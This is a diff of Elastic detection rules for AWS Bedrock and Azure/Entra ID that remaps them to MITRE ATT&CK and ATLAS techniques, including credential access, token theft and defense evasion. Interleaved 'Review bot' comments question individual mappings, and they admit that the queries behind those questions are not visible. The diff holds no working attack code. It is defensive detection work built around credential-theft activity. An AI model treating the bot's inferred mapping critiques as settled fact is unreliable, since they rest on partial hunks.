+[[rule.threat]]
+framework = "MITRE ATLAS"
+
+[[rule.threat.technique]]
+id = "AML.T0040"
+name = "AI Model Inference API Access"
+reference = "https://atlas.mitre.org/techniques/AML.T0040/"
+
+[rule.threat.tactic]
+id = "AML.TA0000"
+name = "AI Model Access"
+reference = "https://atlas.mitre.org/tactics/AML.TA0000/"
diff --git a/rules/integrations/aws_bedrock/aws_bedrock_multiple_word_policy_blocks_detected.toml b/rules/integrations/aws_bedrock/aws_bedrock_multiple_word_policy_blocks_detected.toml
index e59b0217bfd..3410cb1a594 100644
--- a/rules/integrations/aws_bedrock/aws_bedrock_multiple_word_policy_blocks_detected.toml
+++ b/rules/integrations/aws_bedrock/aws_bedrock_multiple_word_policy_blocks_detected.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/11/20"
 integration = ["aws_bedrock"]
 maturity = "production"
-updated_date = "2025/11/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -66,15 +66,7 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor
 https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html
 """
 severity = "medium"
-tags = [
- "Domain: LLM",
- "Data Source: AWS Bedrock",
- "Data Source: AWS S3",
- "Use Case: Policy Violation",
- "Mitre Atlas: T0051",
- "Mitre Atlas: T0054",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: LLM", "Tactic: Discovery", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -106,3 +98,20 @@ from logs-aws_bedrock.invocation-*
 | sort Esql.ml_policy_blocked_profanity_count desc
 '''
+[[rule.threat]]
+framework = "MITRE ATLAS"
+
+[[rule.threat.technique]]
+id = "AML.T0084"
+name = "Discover AI Agent Configuration"
+reference = "https://atlas.mitre.org/techniques/AML.T0084/"
+
+[[rule.threat.technique]]
+id = "AML.T0089"
+name = "Process Discovery"
+reference = "https://atlas.mitre.org/techniques/AML.T0089/"
+
+[rule.threat.tactic]
+id = "AML.TA0008"
+name = "Discovery"
+reference = "https://atlas.mitre.org/tactics/AML.TA0008/"
diff --git a/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml b/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml
index aa6c1fdbe9e..93c5d59841a 100644
--- a/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml
+++ b/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/05/01"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/02/12"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
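Review bot: The threat hunk maps a word-policy guardrail block (the query sorts on `Esql.ml_policy_blocked_profanity_count`) to `AML.T0084` "Discover AI Agent Configuration" and `AML.T0089` "Process Discovery", and nothing visible in the diff explains why a profanity/word filter hit is evidence of either; the same question applies to the topic-policy rule's `AML.T0069` "Discover LLM System Information". A one-sentence rationale in the rule's description (outside this hunk) or in the PR description would let future maintainers judge whether the mapping still fits when the guardrail policies change.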
@@ -119,16 +119,21 @@ event.dataset:azure.signinlogs
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1213"
 name = "Data from Information Repositories"
 reference = "https://attack.mitre.org/techniques/T1213/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1213.002"
 name = "Sharepoint"
 reference = "https://attack.mitre.org/techniques/T1213/002/"
-
+[[rule.threat.technique]]
+id = "T1530"
+name = "Data from Cloud Storage"
+reference = "https://attack.mitre.org/techniques/T1530/"
 [rule.threat.tactic]
 id = "TA0009"
@@ -137,17 +142,21 @@ reference = "https://attack.mitre.org/tactics/TA0009/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1566"
-name = "Phishing"
-reference = "https://attack.mitre.org/techniques/T1566/"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["azure.signinlogs.properties.app_id", "azure.signinlogs.properties.tenant_id"]
diff --git a/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml b/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml
index 3f48cab4cf9..6c94f0ef0c2 100644
--- a/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml
+++ b/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/05/06"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
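Review bot: The added `[[rule.threat.technique]]` table for T1530 is appended directly after the T1213.002 sub-technique's `reference` line, replacing the blank line that was there, while the same hunk inserts blank separators before every other table in this threat entry; the result reads as though T1530 were part of the sub-technique. Keep the separator, i.e. leave the removed blank line in place before `+[[rule.threat.technique]]` (or add `+` blank lines around the new table) so the style matches the rest of the hunk. The same missing separator occurs for the added sub-technique tables in the graph email-access rule (T1114.002), the suspicious sign-in rule (T1550.001), the network-watcher deletion rule (T1562.008) and the alert-suppression rule (T1562.001), and for the T1078.004 block in this file's second hunk.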
@@ -101,17 +101,21 @@ event.dataset:azure.graphactivitylogs
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1114"
 name = "Email Collection"
 reference = "https://attack.mitre.org/techniques/T1114/"
+[[rule.threat.technique.subtechnique]]
+id = "T1114.002"
+name = "Remote Email Collection"
+reference = "https://attack.mitre.org/techniques/T1114/002/"
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = [
diff --git a/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml b/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml
index a94c27b574e..07c41f830ef 100644
--- a/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml
+++ b/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/12/02"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/01/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -110,30 +110,13 @@ from logs-azure.signinlogs-* metadata _id, _version, _index
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1528"
 name = "Steal Application Access Token"
 reference = "https://attack.mitre.org/techniques/T1528/"
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1566"
-name = "Phishing"
-reference = "https://attack.mitre.org/techniques/T1566/"
-[[rule.threat.technique.subtechnique]]
-id = "T1566.002"
-name = "Spearphishing Link"
-reference = "https://attack.mitre.org/techniques/T1566/002/"
-
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-
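Review bot: The device-code sign-in hunk removes the entire Initial Access `[[rule.threat]]` entry (T1566 / T1566.002), but this file's `tags` array is not part of the diff, so it is not visible whether a `"Tactic: Initial Access"` tag is left behind; if it is, the tag no longer has a matching threat tactic, which is exactly the inconsistency the rest of this commit is cleaning up. Please confirm the tags line for this rule was checked, and likewise for the storage-account-keys rule in the next file, where the Initial Access (T1078.004) entry is removed with no visible tags change.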
diff --git a/rules/integrations/azure/credential_access_azure_storage_account_keys_accessed.toml b/rules/integrations/azure/credential_access_azure_storage_account_keys_accessed.toml
index 275eddfe849..3e8f36dcffc 100644
--- a/rules/integrations/azure/credential_access_azure_storage_account_keys_accessed.toml
+++ b/rules/integrations/azure/credential_access_azure_storage_account_keys_accessed.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/09/23"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/09/23"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -96,34 +96,13 @@ value = "now-7d"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1555"
-name = "Credentials from Password Stores"
-reference = "https://attack.mitre.org/techniques/T1555/"
-[[rule.threat.technique.subtechnique]]
-id = "T1555.006"
-name = "Cloud Secrets Management Stores"
-reference = "https://attack.mitre.org/techniques/T1555/006/"
+[[rule.threat.technique]]
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
-
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
\ No newline at end of file
diff --git a/rules/integrations/azure/credential_access_entra_id_excessive_account_lockouts.toml b/rules/integrations/azure/credential_access_entra_id_excessive_account_lockouts.toml
index a0016af7ce5..1bbd401d0e9 100644
--- a/rules/integrations/azure/credential_access_entra_id_excessive_account_lockouts.toml
+++ b/rules/integrations/azure/credential_access_entra_id_excessive_account_lockouts.toml
@@ -4,7 +4,7 @@ integration = ["azure"]
 maturity = "production"
 min_stack_comments = "Changing min stack to 9.1.0, the latest minimum supported version for 9.X releases."
 min_stack_version = "9.1.0"
-updated_date = "2026/01/12"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -107,32 +107,21 @@ event.dataset: "azure.signinlogs" and event.category: "authentication"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1110"
 name = "Brute Force"
 reference = "https://attack.mitre.org/techniques/T1110/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1110.001"
 name = "Password Guessing"
 reference = "https://attack.mitre.org/techniques/T1110/001/"
-[[rule.threat.technique.subtechnique]]
-id = "T1110.003"
-name = "Password Spraying"
-reference = "https://attack.mitre.org/techniques/T1110/003/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1110.004"
-name = "Credential Stuffing"
-reference = "https://attack.mitre.org/techniques/T1110/004/"
-
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
 [rule.threshold]
 field = []
 value = 30
diff --git a/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml b/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml
index b1e86ae2c14..bf8c794d9eb 100644
--- a/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml
+++ b/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/28"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
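Review bot: Dropping T1110.003 Password Spraying and T1110.004 Credential Stuffing leaves only T1110.001 Password Guessing, yet the threshold section visible at the end of the hunk (`field = []`, `value = 30`) counts lockouts across all accounts rather than per user, and many lockouts spread over many accounts is the usual signature of spraying, not of guessing against one account. If the intent is to narrow this rule to per-account guessing, the threshold should group on the user field; otherwise keeping `T1110.003` alongside `T1110.001` seems more accurate. The rule query itself starts outside the hunk, so this is inferred from the threshold and the file name alone.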
@@ -54,17 +54,7 @@ setup = """#### Required Azure Entra Sign-In Logs
 This rule requires the Azure logs integration be enabled and configured to collect all logs, including sign-in logs from Entra. In Entra, sign-in logs must be enabled and streaming to the Event Hub used for the Azure logs integration.
 """
 severity = "high"
-tags = [
- "Domain: Cloud",
- "Domain: SaaS",
- "Data Source: Azure",
- "Data Source: Entra ID",
- "Data Source: Entra ID Sign-in",
- "Use Case: Identity and Access Audit",
- "Use Case: Threat Detection",
- "Tactic: Credential Access",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Azure", "Data Source: Entra ID", "Data Source: Entra ID Sign-in", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -135,30 +125,31 @@ from logs-azure.signinlogs-* metadata _id, _version, _index
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1528"
 name = "Steal Application Access Token"
 reference = "https://attack.mitre.org/techniques/T1528/"
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1566"
-name = "Phishing"
-reference = "https://attack.mitre.org/techniques/T1566/"
-[[rule.threat.technique.subtechnique]]
-id = "T1566.002"
-name = "Spearphishing Link"
-reference = "https://attack.mitre.org/techniques/T1566/002/"
+id = "T1550"
+name = "Use Alternate Authentication Material"
+reference = "https://attack.mitre.org/techniques/T1550/"
+[[rule.threat.technique.subtechnique]]
+id = "T1550.001"
+name = "Application Access Token"
+reference = "https://attack.mitre.org/techniques/T1550/001/"
 [rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/azure/credential_access_entra_id_totp_brute_force_attempts.toml b/rules/integrations/azure/credential_access_entra_id_totp_brute_force_attempts.toml
index a4e8626eee9..b4936e24a57 100644
--- a/rules/integrations/azure/credential_access_entra_id_totp_brute_force_attempts.toml
+++ b/rules/integrations/azure/credential_access_entra_id_totp_brute_force_attempts.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/12/11"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -161,19 +161,13 @@ from logs-azure.signinlogs-* metadata _id, _version, _index
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1110"
 name = "Brute Force"
 reference = "https://attack.mitre.org/techniques/T1110/"
-[[rule.threat.technique.subtechnique]]
-id = "T1110.001"
-name = "Password Guessing"
-reference = "https://attack.mitre.org/techniques/T1110/001/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
diff --git a/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml b/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml
index b1b7021a706..4b240b4a0cf 100644
--- a/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml
+++ b/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/07/10"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -70,18 +70,7 @@ To ensure this rule functions correctly, the following diagnostic logs must be e
 - AuditEvent: This log captures all read and write operations performed on the Key Vault, including secret, key, and certificate retrievals. These logs should be streamed to the Event Hub used for the Azure integration configuration.
 """
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Domain: Storage",
- "Domain: Identity",
- "Data Source: Azure",
- "Data Source: Azure Platform Logs",
- "Data Source: Azure Key Vault",
- "Use Case: Threat Detection",
- "Use Case: Identity and Access Audit",
- "Tactic: Credential Access",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Domain: Storage", "Domain: Identity", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Azure", "Data Source: Azure Platform Logs", "Data Source: Azure Key Vault", "Use Case: Threat Detection", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -175,19 +164,31 @@ by Esql.time_window_date_trunc, azure.platformlogs.identity.claim.upn
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1213"
+name = "Data from Information Repositories"
+reference = "https://attack.mitre.org/techniques/T1213/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1555"
 name = "Credentials from Password Stores"
 reference = "https://attack.mitre.org/techniques/T1555/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1555.006"
 name = "Cloud Secrets Management Stores"
 reference = "https://attack.mitre.org/techniques/T1555/006/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
diff --git a/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml b/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml
index 8a88cceeb2f..6bad05244fd 100644
--- a/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml
+++ b/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/19"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/09/30"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -67,13 +67,7 @@ references = [
 risk_score = 21
 rule_id = "1e0b832e-957e-43ae-b319-db82d228c908"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: Azure",
- "Use Case: Identity and Access Audit",
- "Tactic: Credential Access",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -84,34 +78,18 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1552"
-name = "Unsecured Credentials"
-reference = "https://attack.mitre.org/techniques/T1552/"
-[[rule.threat.technique.subtechnique]]
-id = "T1552.005"
-name = "Cloud Instance Metadata API"
-reference = "https://attack.mitre.org/techniques/T1552/005/"
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1098.001"
 name = "Additional Cloud Credentials"
 reference = "https://attack.mitre.org/techniques/T1098/001/"
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
diff --git a/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml b/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml
index d9817465e01..663788378b1 100644
--- a/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml
+++ b/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/09/01"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
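Review bot: After this hunk the storage-account-key-regenerated rule maps only to Persistence (`TA0003`), and the tags hunk in the same file swaps `"Tactic: Credential Access"` for `"Tactic: Persistence"`, but the file keeps its `credential_access_` name prefix. If the repository's file naming is meant to follow the rule's primary tactic, a rename (or a note that the prefix is historical) would avoid the mismatch. The same drift appears in `discovery_storage_blob_container_access_modification.toml` (now Defense Evasion only) and `exfiltration_azure_storage_blob_download_azcopy_sas_token.toml` (now Collection only) later in this diff.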
@@ -62,7 +62,7 @@ references = [
 risk_score = 21
 rule_id = "8ddab73b-3d15-4e5d-9413-47f05553c1d7"
 severity = "low"
-tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Configuration Audit", "Tactic: Defense Evasion", "Resources: Investigation Guide"]
+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Impact", "Data Source: Azure", "Use Case: Configuration Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -76,8 +76,25 @@ event.dataset:azure.activitylogs and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1070"
+name = "Indicator Removal"
+reference = "https://attack.mitre.org/techniques/T1070/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1485"
+name = "Data Destruction"
+reference = "https://attack.mitre.org/techniques/T1485/"
+
+[rule.threat.tactic]
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
diff --git a/rules/integrations/azure/defense_evasion_insights_diagnostic_settings_deletion.toml b/rules/integrations/azure/defense_evasion_insights_diagnostic_settings_deletion.toml
index 7f1c35aedb6..aec440c0508 100644
--- a/rules/integrations/azure/defense_evasion_insights_diagnostic_settings_deletion.toml
+++ b/rules/integrations/azure/defense_evasion_insights_diagnostic_settings_deletion.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/17"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
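Review bot: Mapping an Automation runbook deletion to `T1070` "Indicator Removal" implies the deleted object is evidence of an intrusion, whereas a runbook is an operational asset, and the T1485 "Data Destruction" entry added in the same hunk already covers the destructive aspect. If the concern is that deleting remediation or monitoring runbooks weakens defences, `T1562` "Impair Defenses" would be the more conventional Defense Evasion technique; otherwise a sentence in the rule description explaining the T1070 choice would help reviewers. The description is outside this hunk, so this is inferred from the file name and the technique names alone.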
@@ -84,27 +84,21 @@ event.dataset:azure.activitylogs
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
-[[rule.threat.technique.subtechnique]]
-id = "T1562.001"
-name = "Disable or Modify Tools"
-reference = "https://attack.mitre.org/techniques/T1562/001/"
 [[rule.threat.technique.subtechnique]]
 id = "T1562.008"
 name = "Disable or Modify Cloud Logs"
 reference = "https://attack.mitre.org/techniques/T1562/008/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml b/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml
index 76a3d0239cb..4e60e6ae26d 100644
--- a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml
+++ b/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/06/24"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Austin Songer"]
@@ -80,19 +80,13 @@ event.outcome:(Success or success)
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1562"
-name = "Impair Defenses"
-reference = "https://attack.mitre.org/techniques/T1562/"
-[[rule.threat.technique.subtechnique]]
-id = "T1562.001"
-name = "Disable or Modify Tools"
-reference = "https://attack.mitre.org/techniques/T1562/001/"
-
+[[rule.threat.technique]]
+id = "T1070"
+name = "Indicator Removal"
+reference = "https://attack.mitre.org/techniques/T1070/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml b/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml
index 0acbfc2f754..9c69e71409e 100644
--- a/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml
+++ b/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/31"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -81,19 +81,23 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1562.001"
 name = "Disable or Modify Tools"
 reference = "https://attack.mitre.org/techniques/T1562/001/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1562.008"
+name = "Disable or Modify Cloud Logs"
+reference = "https://attack.mitre.org/techniques/T1562/008/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml b/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml
index 5421c5675f8..8ef3beefa07 100644
--- a/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml
+++ b/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/08/27"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Austin Songer"]
@@ -81,14 +81,18 @@ event.outcome: "success"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+[[rule.threat.technique.subtechnique]]
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/azure/discovery_bloodhound_user_agents_detected.toml b/rules/integrations/azure/discovery_bloodhound_user_agents_detected.toml
index dcdc2b1b80e..a537e8045fc 100644
--- a/rules/integrations/azure/discovery_bloodhound_user_agents_detected.toml
+++ b/rules/integrations/azure/discovery_bloodhound_user_agents_detected.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/06/03"
 integration = ["azure", "o365"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -118,36 +118,27 @@ any where event.dataset : (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1069"
 name = "Permission Groups Discovery"
 reference = "https://attack.mitre.org/techniques/T1069/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1069.003"
 name = "Cloud Groups"
 reference = "https://attack.mitre.org/techniques/T1069/003/"
-
-[[rule.threat.technique]]
-id = "T1082"
-name = "System Information Discovery"
-reference = "https://attack.mitre.org/techniques/T1082/"
-
 [[rule.threat.technique]]
 id = "T1087"
 name = "Account Discovery"
 reference = "https://attack.mitre.org/techniques/T1087/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1087.004"
 name = "Cloud Account"
 reference = "https://attack.mitre.org/techniques/T1087/004/"
-
-[[rule.threat.technique]]
-id = "T1201"
-name = "Password Policy Discovery"
-reference = "https://attack.mitre.org/techniques/T1201/"
-
 [[rule.threat.technique]]
 id = "T1526"
 name = "Cloud Service Discovery"
@@ -158,14 +149,7 @@ id = "T1580"
 name = "Cloud Infrastructure Discovery"
 reference = "https://attack.mitre.org/techniques/T1580/"
-[[rule.threat.technique]]
-id = "T1673"
-name = "Virtual Machine Discovery"
-reference = "https://attack.mitre.org/techniques/T1673/"
-
-
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
-
diff --git a/rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml b/rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml
index d8c4b0c0ae9..34fc96dc32c 100644
--- a/rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml
+++ b/rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/07/02"
 integration = ["azure", "o365"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -79,18 +79,7 @@ references = [
 risk_score = 47
 rule_id = "f541ca3a-5752-11f0-b44b-f661ea17fbcd"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: Azure",
- "Data Source: Microsoft 365",
- "Data Source: Microsoft 365 Audit Logs",
